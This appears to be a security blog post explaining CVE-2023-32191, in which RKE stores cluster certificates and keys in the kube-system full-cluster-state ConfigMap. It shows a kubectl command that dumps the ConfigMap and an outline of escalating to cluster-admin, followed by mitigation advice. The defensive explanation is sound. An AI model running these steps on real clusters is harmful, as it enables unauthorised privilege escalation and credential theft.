When you work with Kubernetes clusters using Rancher Kubernetes Engine (RKE), you expect everything to be secure by default. But sometimes, even the best tools have blind spots. CVE-2023-32191 is one of those cases—a vulnerability that arises when RKE stores sensitive cluster state information in an overly accessible Kubernetes object, making cluster privilege escalation far too easy.
Let’s break down what this means in plain English, see exactly where the problem lies, and even walk through a simple scenario and code snippet showing exploitation. By the end, you’ll understand why this matters, and what you can do about it.
What’s the Problem?
RKE provisions a brand-new cluster, and to keep track of what's actually running, it stores all the configuration and state data in a Kubernetes ConfigMap called full-cluster-state. This ConfigMap lives inside the kube-system namespace and reflects the entire cluster state—including certificates, encryption keys, and user credentials.
The real snag? Non-admin users (those with read access to ConfigMaps in kube-system) can fetch this object, see all its juicy secrets, and use them to become full-blown cluster admins.
How Does This Lead to Escalation?
In Kubernetes, ConfigMaps are meant to store non-sensitive information (like config files), but here, the RKE full-cluster-state ConfigMap actually contains sensitive data. If a user who shouldn’t have admin rights can get this ConfigMap, they can:
Import the entire state into their own RKE instance
This makes it possible to go from a low-privilege account to *cluster-admin* — the highest privilege possible.
See It in Action: Dumping the full-cluster-state as a Non-Admin
Let’s imagine your user has only read access to ConfigMaps in the kube-system namespace. Here’s how you could grab the cluster state:
kubectl get configmap full-cluster-state -n kube-system -o yaml > cluster-state.yaml
Inside cluster-state.yaml, you’ll see something like this (trimmed for size)
apiVersion: v1
data:
full-cluster-state: |
{
"nodes": [...],
"services": {
"etcd": {
"certificates": {
"ca-key": "-----BEGIN PRIVATE KEY----- ...",
"ca-cert": "-----BEGIN CERTIFICATE----- ...",
...
}
},
...
}
}
kind: ConfigMap
metadata:
name: full-cluster-state
namespace: kube-system
Notice those "ca-key" and "ca-cert" fields? Those are real certificate secrets—enough to reconstruct kubeconfig files or even connect to etcd directly.
`bash
export KUBECONFIG=./reconstructed-admin.kubeconfig
`
Boom. In a few quick steps, you’ve jumped from a basic permissions user to super-admin, all thanks to the full-cluster-state ConfigMap.
Over-privileged ConfigMap: Secrets should not live in ConfigMaps.
- Namespace Misplacement: kube-system is often readable by more users than kube-public or kube-admin.
- Broken Principle of Least Privilege: If you have any access to full-cluster-state, you can become an admin.
Restrict RBAC: Be extremely strict with who can read ConfigMaps in kube-system.
- Move Secrets: Don’t let RKE store sensitive data in ConfigMaps. Use Kubernetes Secrets or external secret managers like HashiCorp Vault.
Monitor Access: Use audit logs to watch for access to full-cluster-state.
- Upgrade RKE: See if there is a patched version that stores state securely. RKE GitHub Issues.
References and Further Reading
- CVE-2023-32191 (National Vulnerability Database)
- RKE documentation
- Kubernetes Security Best Practices
Conclusion
CVE-2023-32191 is a classic example of why we can’t assume all config data is safe to share and why RBAC should be engineered to the tightest possible restrictions. Take a look at your existing clusters and see who can read ConfigMaps in kube-system—you might just find an unwanted pathway to admin privileges lying around!
If you manage RKE clusters, audit your RBAC policies today and get ahead of this simple—but potent—security risk.
Timeline
Published on: 10/16/2024 12:17:02 UTC